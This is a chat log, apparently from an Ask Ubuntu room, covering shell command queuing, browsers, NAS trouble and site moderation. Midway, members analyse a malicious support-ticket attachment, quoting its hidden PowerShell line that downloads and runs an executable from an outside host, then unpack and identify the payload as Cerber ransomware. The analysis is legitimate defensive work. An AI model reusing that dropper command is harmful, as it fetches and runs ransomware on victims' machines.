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@NathanOsman I've started using it on my phone.
I switched to it on my phone too.
Sadly, a lot of apps hardcode Chrome into their intents.
So I still need to have both :(
Yeah.. I like that in some ways, but it's not great in other ways.
@Seth did you see this?
so, I know I can run multiple commands in the terminal using and, however is there a way to add another command to the "queue" as one is already running? so, while I'm doing something that takes a while, can I go "oh, and do this after too"?
You want two commands to run simultaneously?
oh Brave is Chrome w/ AdBlock
@Zacharee1 ...and HTTPS Everywhere, etc.
how's that work
I'd like to, as another command which takes some time is running, add another one to be executed after the first is done.
@Devilius I think if you put & in between commands they launch simultaneously.
@Zacharee1 Anytime HTTPS is available for a website, the browser automatically uses it.
@Devilius "add another one to be executed after the first is done" - but that's sequential, not concurrent.
is there a way to do that?
While we type we have 2,000 processes running concurrently in Linux / Ubuntu.
&& already does that - it won't launch the second command until the first one finishes and exits with 0.
is there then a way to imitate &&, as that first command is already currently running?
I think if you use a single & it allows you to launch another command.
Ah, I think I see the problem here.
You have a command running and you want to start another one but only after the one already running quits?
specifically I am currently transferring files using scp. I want it so that when file transfer 1 is done, file transfer 2 starts. Can I request something like that after transfer 1 was requested?
That is a very good question.
Luckily there is a very good answer.
But it requires you to know the PID (process ID) of the command.
wait <PID> && second_command
You will need to run that in another terminal.
But it will cause the command to wait until that process ends and then run the second command.
that sounds like exactly what I need
thank you very much!
Do you know the process ID?
Or you could make a script that calls the first command and then the second command.
@WinEunuuchs2Unix That will help in the future but not when the command is already running.
@NathanOsman Well you can always use Ctrl+C and start again... or kill from another terminal
@WinEunuuchs2Unix That doesn't always work - take the cdrecord command, for instance :P
@NathanOsman Well there is this thing called the power button :p
I've successfully fetched the PID. I'll try it now and see if it works
@WinEunuuchs2Unix You're missing the point :D Not everyone wants to + a command that's currently writing data to a CD-R.
ps aux | grep "first command"
Some idiot just sent some malware to our customer support desk.
It's a very cute attempt.
What a nice fellow.
You should hire him.
It's cute.
@KazWolfe What was so cute about it?
hang on.
Hangs on...
he put you on hold.... altruism in customer support.
It's obfuscated.
(code itself isn't dangerous but runs dangerous stuff)
@KazWolfe Don't worry, I don't have anything that could run that.
@NathanOsman It's obfuscated very poorly.
At least not in production :P I do have Office 97 on an old Windows 98 VM.
lines 94 to 102.
they really do most of the damage
basically runs this in a shell:
ok transfer is 95% done....
cmd.Exe /C ""pOWERsHELl.Exe  -EXEcUtIoNPoliCy    ByPaSs -NOPRofilE -wiNdOwstYLe   HiDDeN (nEW-Object     SYsTeM.NET.weBCLieNt).DoWnlOADfiLe(\'http://www.errorpola.top/read.php?f=1.gif\',\'%APpData%.EXE\');sTaRT-pROceSS \'%APPDaTA%.exE\'""
I'mma grab that file.
I got this.
I know what I'm doing.
the disclaimer isn't for you.
it worked! good to know for next time. Interesting to note that I had use the same shell the first command was executed in, as the other would give me: "pid 2993 is not a child of this shell"
it's for the random 10rep people who ander in here.
Hang on. It's an empty payload.
@Devilius Oh, interesting. That's a good thing to know too. Glad it worked for you.
Seems like Linux is all about child processes, parents and orphans some days :/
@NathanOsman It's not.
Like I said, it's cute.
@KazWolfe It must be filtering by user agent or something.
@NathanOsman thanks again! I'm heading off to bed then, bybye
@NathanOsman ding
Lemme try with a PowerShell UA.
Aha. There we go.
$ file output
out: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Nullsoft, eh? We can extract that without executing the file then.
I think 7z does that.
$ 7z x ../output

7-Zip [64] 9.20  Copyright (c) 1999-2010 Igor Pavlov  2010-11-18
p7zip Version 9.20 (locale=en_CA.UTF-8,Utf16=on,HugeFiles=on,4 CPUs)

Processing archive: ../output

Extracting  •€/Diwan.sw
Extracting  •€/fossettes.dll
Extracting  •€/€/System.dll

Everything is Ok

Files: 3
Size:       249186
Compressed: 241691
yeah, that's what I see too.
Clever. Unicode filenames.
no, i think that's nullsoft.
It mangles them?
i think so?
Well, let's feed those three DLLs to VirusTotal.
The first one is clean.
you can just run the exe as a whole
The second one gets 4/57.
it has a lot more we're not seeing
And the third one is clean.
Oh, there's more in the archive?
Well, let me fire up my VM then to see if I can tease more out of it.
Argh. NAS is acting up.
@WinEunuuchs2Unix pgrep ftw :P
Double ARGH. NAS is completely offline.
@NathanOsman yes, yes I did. Been there so many times..
twitter won't let me favorite it for some reason tho
Router restart. BRB in about 2 minutes.
Oh, this is Cerber?
This is some randomware.
looks like some scripts are broken on twitter.
@KazWolfe oooh. hopefully you didn't find it at work?
@Seth ding ding ding.
Someone sent us a customer support ticket with this attached.
Proper warnings and quarantines applied.
@KazWolfe reminds me of devrant.io/rants/232015
cute payload, though (cc @NathanOsman)
This is not good.
The NAS is totally unresponsive.
But the green light is flashing...
...even after I physically disconnect the ethernet cable.
Aha. SSH works.
Web UI is down though.
This thing needs a good restart.
mediacrawler again. Argh.
I keep doing everything I can to kill it.
I think I'm just going to move the file.
yeah, it's just a payload for cerbus
which is already really well documented
it's cool though
and i'm interested that my company was a victim of a semi-targeted attack.
oh well, hopefully people will heed the giant warning on top of the ticket now.
@KazWolfe spin it up on an isolated test machine and see who it wants you to send the random to
just some random bitcoin address
@KazWolfe if you were specifically targeted it's likely different.
i don't think specifically targeted, really.
but it was interesting -- it was sent as an abuse report, which we have to open by law.
> "12/10/10 - set file logging on by default for QA as per Anu's request"
Seen in a changelog for a program installed on the embedded host of an external hard drive.
So here's to Anu, whoever he is.
logging is good.
I'm probably the only person outside the company to ever read that line :P
It's kind of weird to read something that probably was only ever intended for internal use and trace the person to LinkedIn and see "worked at Western Digital" on their profile.
I feel like contacting them and saying, "yo, I found yer script!"
well, this was a fun night of malware analysis
o/ @jokerdino
I have disabled the media crawler on the NAS.
Had to do some clever editing to an init.d script.
it would have been easy with systemd
systemctl disable mediacrawler
It's running a really old version of Debian.
So, no systemd.
but if it had systemd it would have been easy
5 hours later…
@UbuntuUser The command to reboot the system is : sudo reboot and the command to shutdown the machine completely is : sudo poweroff or alternatively : sudo shutdown -h now ! :)
1 hour later…
Long time no see, everyone!
I wanted to ask a quick question: my htop says: Uptime: 106 days(!), 23:45:35. Should I be concerned about this?
I haven't had a good reason to reboot my server, so I think it will be fine... but then again there's an exclamation mark! Oops?
Hey @grooveplex nice to see you around.
If I have no specific reason to restart, I never do. Possibly for months.
Hello ! :)
Hey @cl-netbox!
@JacobVlijm Good afternoon to you Jacob ! :)
Same to you!
@grooveplex Hi ! :) 106 days ? there must have been some kernel upgrades available in that time ... so you should restart the server ... :)
@JacobVlijm Thank you ! :)
@JacobVlijm ^^^^^^
@grooveplex Execute : sudo apt update | sudo apt dist-upgrade to install the newest kernel and once finished, reboot the machine ! :)
Ah, sure. What I meant was, I don't restart without a reason. Updates are a good reason of course.
1 hour later…
@JacobVlijm and even then a restart is not needed. I tend to install and keep on going till I turn my notebook off.
and boxy! :-)
We own speedskating \o/ @JacobVlijm
@Rinzwind Rinzy ! :) Good afternoon ! :)
Nioh is damn good :-)
Nioh ? What is that ?
game that got released this week
ah - thanks ... :)
story about an englishman than went to japan in the 1700s with some dutch trading ships
actually happend ;-)
they made it into a demons souls/dark souls/bloodborne type of game
Was he the one who brought the flowers to Japan ? ;P
think so
ah even earlier
William Adams (24 September 1564 – 16 May 1620), known in Japanese as Miura Anjin (三浦按針: "the pilot of Miura"), was an English navigator who in 1600 was the first of his nation to reach Japan. One of a few survivors of the only Dutch East India Company ship to reach Japan from a five-ship expedition of 1598, Adams settled there and became the first ever (and one of the very few) Western samurai. Soon after Adams' arrival in Japan, he became a key advisor to the shogun Tokugawa Ieyasu. Adams directed construction for the shogun of the first Western-style ships in the country. Adams was later key...
that's the dude
CHILLS over my spine during the trailer when they mentioned the dutch ships :)
aha ... never heard of him before ... interesting :)
Hey @Rinzwind! Greatgreat! I finally got the golden cli badge. No I am going to order some Cinese food and a few nice drinks, an I will close all cli questions in a few hours :)
Thanks :)
we are side by side on that tag :)
@JacobVlijm Congratulations Jacob ! Well done ! Deserved honor ! :)
...both a column...
@cl-netbox thanks!
there starred
You better fix the spelling @JacobVlijm >:)
cinese ;)
@Rinzwind special @JacobVlijm edition ! hahaha :D
I will have chicken with sate today
Shoot 2 minutes are over..
So we can close them together
how do you accidentally delete /var/? :-P
@Rinzwind yes ... that's THE question ! :D
I have yet to close a CLI question :X
oh and boxy: saw my comment? reinstall without format is better ;-)
no ... checking ! :D
done ... hahaha ! :D
and and another one that "accidentally erased his whole disk" :X
People do silly thinks when they get bored.
@Rinzwind what if he created some VM's being located in /var/lib before ? :D :D :D
my notebook has a separate /discworld/ for my personal data but it has ZERO files I could not delete.
my passwords are on google cloud in a safe :P
and the rest is video's I watch when on the road (mainly the weekly animes)
@JacobVlijm In the last time I came to think people here (mostly) always do silly things ! :D
@cl-netbox so implicitely, we are only dealing with silly people here :)
@Rinzwind no need to tell me ... I have all stuff except the system itself on different partitions ... we are brothers in mind when it comes to setups !:)
@JacobVlijm look at (nearly) all those new questions and you know what I mean ... :D
@Rinzwind How can this answer get so many UVs ?
no idea
Q: I found a bug on this website that allowed me to log in on my account without a password

JavaProgrammerI think the title says it all. I am kind of worried about this and where can I contact someone so they can fix this problem?

AUM is late again :+)
AU meta
ah ... Ask Ubuntu Meta
dino-y! :)
It's not just AUM which is late then haha
@jokerdino thanks ! :) Hi ! :)
say gratz Jacob @jokerdino
he got 1k cli
@Rinzwind say gratz boxy : 0 reps today ! :D :D :D
Grats Jacob.
@jokerdino Without an @ he won't see it ... ;P Hi again ! :)
He will feel it.
@jokerdino joker magic ? :D
@jokerdino Thanks a lot!
@user5520049 I saw your question you just deleted. I can understand you - a downvote instead of an answer is not very nice. Please join me here ... maybe I can help you ! :)
he wont get that message.
why Rinzy ? I'm talking about this topic -> askubuntu.com/questions/882554/…
afaik you need to have been IN chat to receive messages from chat
I got a text message on my cell phone once from chat.
And it still vibrates / makes message sounds when someone pings me here but it doesn't display the text message anymore possibly because stack exchange is always running.
you need the SE app for chat notifications IIRC
Probably... SE app is always running on my phone. The regular chrome screen is too hard to read and navigate on a 5.5" screen. But when I first started using AU I didn't have SE app installed and that is when a chat ping appeared as a regular cell phone text message on my phone.
@jokerdino ...and indeed, it was delivered to me in a vision.
@JacobVlijm haha awesome.
congratulations @JacobVlijm ^_^
Hi @Zanna thanks! I am so totally going to abuse that :)
haha muru hammered shut a lovely question a couple of weeks ago just before I could hit the Post Your Answer button XD
Yeah that sounds like him :)
Hi @Zanna ! :) Good afternoon to you ! :) Everything superfine as usually ? :)
@Zanna I know that feeling it's happened to me before too.
@WinEunuuchs2Unix I didn't mind, OP got their answer, and I'd had my fun
When it's a very long answer it's even more disappointing!
@cl-netbox yeah pretty fine :)
@Zanna Great ... glad to hear it ! :)
Geez I have to ask 8 questions for my next silver badge. It's so hard asking a new question because most things you don't know can be answered via google.
I don't have that badge either @WinEunuuchs2Unix I'm rubbish at thinking of questions
me too D:
@Zanna You are too busy answering questions to think of them :) Plus you already know too much...hehe
I am not an asker :P
Rinzy also knows too much!
@WinEunuuchs2Unix nah I just don't know what I don't know XD
Hmm... sounds philosophical :p
@WinEunuuchs2Unix too much ? Rinzy knows EVERYTHING ! :D
Rinzy for MOD 2017! (along with Zanna, Serg, Zachree1 and Kaz Wolfe)
But then they'll have to rename this room to "AU Mod Room" :p
@WinEunuuchs2Unix Make all of us mods and let the users rule ! :D :D :D
@cl-netbox Hehe our first job as new citizen mods will be to ban all the old mods :p
@WinEunuuchs2Unix hahaha :D :D :D
Well my question that took me a week to think up since the last question has already got two upvotes with only 9 views... That one might gain traction... unless it was you guys giving me "pity votes"...haha
me? lol
@Zacharee1 Sure you would make a great mod I think... don't you agree?
doubt it
You're always concerned with getting VTC's down... that seems like a good mod quality... Plus you know lots of stuff.
@WinEunuuchs2Unix Generally I think we already have enough competent mods around ! :)
@cl-netbox Make no mistake I think all our existing mods are great and each have a wealth of skills/knowledge in different areas (some overlapping of course).
Well it's time for boring chore of washing hair...bbl
The Softpedia link is no good. I will search for Easybcd. I think my Grub installation is fine. I can view it with "shift" on startup. Thanks for your answer. I have to leave for a while. I will try your windows disc repair when return. — william t Oct 20 '14 at 16:59
never returned, so no repro I think!
@Zanna So VTC as "too broad" or "unreproducable"?
there are two posts there
1st one too broad, 2nd no repro, in my opinion anyway
ookies... got my two VTC's in :)
thank you kindly :D
I might have complained about the whip cracking but it was definitely a good thing to get the CV queue down and I think it's pretty obvious that @Zacharee1 really cares about the site & does a lot of stuff to keep/make it awesome :)
I feel a little guilty about VTC's because now I'm getting so many programming ideas I get wrapped up in a project for two to three days and there is little time except for the project du juere, eating, working and sleeping.
don't stress :) if you do stuff, the site will be that bit better. But if you do nothing, it will still be fine.
> Unlike share permissions, NTFS folders have six standard permissions, and NTFS files have five. Folders also have 14 special permissions, and files have 13.
I have 1 cat.
@JacobVlijm GNU or BSD cat ?
or android?
@Seth there's android cat ?
Oh, that's one of those easter eggs
@Serg I asked her, but she refuses to tell me.
Maybe she doesn't speak Dutch ? :D
You should find somebody selling a Tardis translation matrix...
^ the ultimate wallpaper for vegans xD
It's a screenshot from a game called "Alice is dead 3"
(cc @Zanna ;D )
Anyone familiar with Cmake/llvm?
Trying to compile LLD
I get Library `Demangle' not found in list of llvm libraries.
Guys do you remember that website where you spam the keyboard and it prints linux kernel code ?
can i haz the address plz ?
hacker typer iirc
@Serg hackertyper.net is better.
@Seth thanks.
Anyone familiar with anaconda?
sounds dangerous.
@Seth yeah, I think it is :) I know someone who used to use matlab, was adviced to switch to anaconda. Seems a useless step to me if you have plain python, but I am not familiar enough with neither anaconda nor matlab
have you tried asking in the SO python room?
AHAAA, thanks @Seth
@JacobVlijm why were they advised to swithc to anaconda ? Matlab is pretty widespread where heavy computation is required, especially in engineering
@Serg it was mentioned to be "more familiar" to people who are used to Matlab. Doesn't sound as a valid recommendation to me though
...If you want to step to python anyway
In science, it is recommended to use languages like Perl, Python, R instead of SciPy, Matlab etc. If that is the case, I'd go for the final goal and not have something like anaconda in between, but My knowledge of anaconda is practivcally none.
good evening
1st Boss done and in 2 attempts \o/
I'm not certain my answer here is right because I've never used grub with EFI systems: askubuntu.com/questions/882724/…
life++ == 43
secret code for gaining powers in a video game @Seth?
@WinEunuuchs2Unix it should be haha
Do you know about booting grub on EFI systems with Windows 10 dual-boot? I have a bad feeling about the answer I posted and wondered if I should delete it: askubuntu.com/questions/882724/…
@WinEunuuchs2Unix we have a whole question about dual installing on pre-installed UEFI systems
is that not sufficient?
great I'll vote close it instead...way better than sweating out an answer that isn't good enough :)
Q: Installing Ubuntu Alongside a Pre-Installed Windows with UEFI

Michał TaborI'm absolutely new to Linux. I have been using Windows for all my life. But, I have read about Ubuntu (and Linux in general) and I think I'll like it. So, I wanted to know how to install Ubuntu on my PC with a Pre-Installed Windows 8 or later on it. Can I do it with Wubi or through the Live USB/...

this is what i refer to, not sure if it fits into the question though
Only problem is how do we know it is UEFI? I gave answers for both EFI and CSM booting.
@WinEunuuchs2Unix we'd need info from the OP, i think that's a question I didn't dupe-vote because partly unclear
oh fun my lxc-bootstrap script is nearly complete :)
lol@bootstrap loader. Not many people say that anymore.
@WinEunuuchs2Unix actually it's just a customized script that tweaks what's in the image
Indeed not many boots even have straps anymore!
installs packages I want on all my containers, removes others, changes users/passwords, etc.
throws @WinEunuuchs2Unix into the void
I'm already in the void! Your bootstrap loader routine does sound comprehensive though and like a lot of work.
@WinEunuuchs2Unix well it does a good bit of stuff
i'm finishing up some of the basics but I can share the WIP
@ThomasWard Do you maintain a blog somewhere with all your work?

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